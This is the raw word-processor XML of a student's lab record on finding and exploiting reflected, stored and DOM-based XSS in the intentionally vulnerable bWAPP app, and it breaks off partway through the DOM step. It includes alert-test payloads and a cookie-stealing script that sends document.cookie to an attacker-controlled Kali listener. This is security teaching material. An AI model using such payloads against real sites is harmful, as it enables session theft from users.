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C383" w14:textId="77777777" w:rsidR="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100" w:line="220" w:lineRule="auto"/>
        <w:ind w:left="6268"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487508480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4BFF70C4" wp14:editId="2195F196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79742" cy="102146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2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AME:_DHANALAKSHMI_C_ROLL:NO:241901023"/>
      <w:bookmarkStart w:id="1" w:name="EXPERIMENT_12"/>
      <w:bookmarkStart w:id="2" w:name="IDENTIFY_XSS_VULNERABILITIES_IN_WEBAPPLI"/>
      <w:bookmarkStart w:id="3" w:name="AIM:"/>
      <w:bookmarkStart w:id="4" w:name="THEORY:"/>
      <w:bookmarkStart w:id="5" w:name="TOOLS_REQUIRED:"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t>NAME:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0008106A">
        <w:t>Keerthika</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657995BA" w14:textId="33074879" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100" w:line="220" w:lineRule="auto"/>
        <w:ind w:left="6268"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ROLL:NO:2419010</w:t>
      </w:r>
      <w:r w:rsidR="0008106A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0471FBE8" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="55"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D9A602" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>EXPERIMENT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  <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC27370" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>IDENTIFY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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>XSS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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>VULNERABILITIES</w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>IN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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>WEBAPPLICATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D3924A" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="293"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9FEB6F" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>AIM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E17F744" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="159" w:line="220" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="377"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>To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identify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and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exploit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Cross-Site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Scripting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(XSS)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vulnerabilities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-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Reflected,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Stored,</w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>and DOM-based - in a vulnerable web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18759B96" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DE7F96" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>THEORY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD1A33D" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="143" w:line="220" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="66"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>XSS occurs when a web application takes user input and displays it back on a page without properly sanitizing it. This lets an attacker inject JavaScript that runs in another user's browser, potentially stealing cookies, session tokens, or redirecting users to phishing pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71703DD7" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="662"/>
          <w:tab w:val="left" w:pos="744"/>
        </w:tabs>
        <w:spacing w:before="42" w:line="206" w:lineRule="auto"/>
        <w:ind w:right="226" w:hanging="310"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Reflected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XSS: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payload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is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part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of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the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URL/request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and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immediately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reflected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in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 xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A014368" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="679"/>
          <w:tab w:val="left" w:pos="735"/>
        </w:tabs>
        <w:spacing w:before="27" w:line="230" w:lineRule="auto"/>
        <w:ind w:left="735" w:right="150" w:hanging="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Stored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XSS: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payload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is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saved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in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the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database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(e.g.,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a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comment)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and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served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to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 xml:space="preserve">every </w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>visitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D83F8F9" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="679"/>
          <w:tab w:val="left" w:pos="735"/>
        </w:tabs>
        <w:spacing w:before="129" w:line="230" w:lineRule="auto"/>
        <w:ind w:left="735" w:right="109" w:hanging="284"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DOM-based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XSS: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payload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never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touches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the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server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—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it's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executed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purely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by</w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>client-side JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF33C99" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="227"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1068B91D" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>TOOLS</w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>REQUIRED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C924702" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="996"/>
        </w:tabs>
        <w:spacing w:before="126"/>
        <w:ind w:left="996" w:hanging="252"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BAD76B" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRPr="0008106A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="996"/>
        </w:tabs>
        <w:spacing w:before="112" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="744" w:right="1239" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0008106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (has dedicated modules for all 3 XSS types) – set security to low 3. Any browser with Developer Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E6E67B" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="331" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00953AA4">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11910" w:h="16850"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6924E8E1" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="84"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487508992" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1061CDEE" wp14:editId="1325CD0D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>241387</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>241388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7079742" cy="102146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742" cy="1021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PROCEDURE:"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>PROCEDURE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4806E4AB" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="46"/>
        <w:ind w:left="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1 — Reflected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F414C" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="130" w:line="220" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="439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t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Cross-Site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(Reflected)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>module.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search/input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>field, enter: &lt;script&gt;alert('Reflected-XSS-Test</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF8DDE5" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="272" w:line="220" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="377"/>
      </w:pPr>
      <w:r>
        <w:t>Submit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pop-up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 xml:space="preserve">the input was reflected and executed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unsanitized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45657980" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F2FF23" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="218"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6532C12C" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2 — Stored </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67299E8E" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112" w:line="282" w:lineRule="exact"/>
        <w:ind w:left="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> → Cross-Site Scripting (Stored) — Blog module. Post a comment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4AB2A" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="282" w:lineRule="exact"/>
        <w:ind w:left="24"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;alert('Stored-XSS-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28175495" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="281" w:line="220" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="377"/>
      </w:pPr>
      <w:r>
        <w:t>Submit it. Now reload the page or visit it from a different browser tab — the alert fires again</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>automatically,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>proving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payload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permanently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every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>visitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2214A84E" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="144"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D897974" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3 — Cookie stealing demonstration (safe/lab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0504B2" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="1798"/>
      </w:pP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alert,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>inject:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>='http://&lt;kali-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ip&gt;:8000/steal?c='+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51920B49" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="151"/>
        <w:ind w:left="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start a listener on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC7DBA4" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:ind w:left="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042008B" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="262" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="231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comment,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cookie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listener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visible in the terminal log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B7F94" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00953AA4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="52"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CFA3B9C" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="24"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4 — DOM-based </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CDD09F" w14:textId="77777777" w:rsidR="00953AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="130" w:line="220" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="231"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bWAPP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
